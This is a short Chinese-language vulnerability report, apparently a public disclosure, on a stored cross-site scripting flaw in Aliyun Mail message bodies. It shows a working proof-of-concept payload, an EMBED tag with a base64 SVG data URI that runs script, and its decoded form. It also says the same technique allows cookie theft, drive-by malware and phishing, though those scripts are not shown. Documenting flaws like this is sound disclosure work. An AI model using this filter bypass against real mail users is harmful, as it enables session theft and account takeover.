阿里云邮箱邮件正文存在存储型跨站漏洞,可通过在HTML内嵌data uri scheme标记的方式来绕过执行恶意脚本。成功窃取信息可以登陆受攻击者邮箱,甚至阿里云用户中心(从雅虎邮箱迁移申请的aliyun邮箱登陆密码可同时登陆用户中心)。 该漏洞能够在除IE以外的Fire
该漏洞能够在除IE以外的FireFox,Opera,webkit内核浏览器,Safari下执行成功,通过发送邮件
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoJ2dvb2Qgam9iJyk7PC9zY3JpcHQ+PC9zdmc+" AllowScriptAccess="always"></EMBED>,base64部分解密为
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><script type="text/ecmascript">alert('good job');</script></svg>,可以触发漏洞,如图:

通过更换base64部分编码的脚本可实施一些常规攻击(以下在Firefox下测试通过):
1 邮件挂马

2 cookie及访问者信息窃取


3 XSS phishing,URL保持不变刷伪造页面:

刷写脚本:

修复方案:
过滤
过滤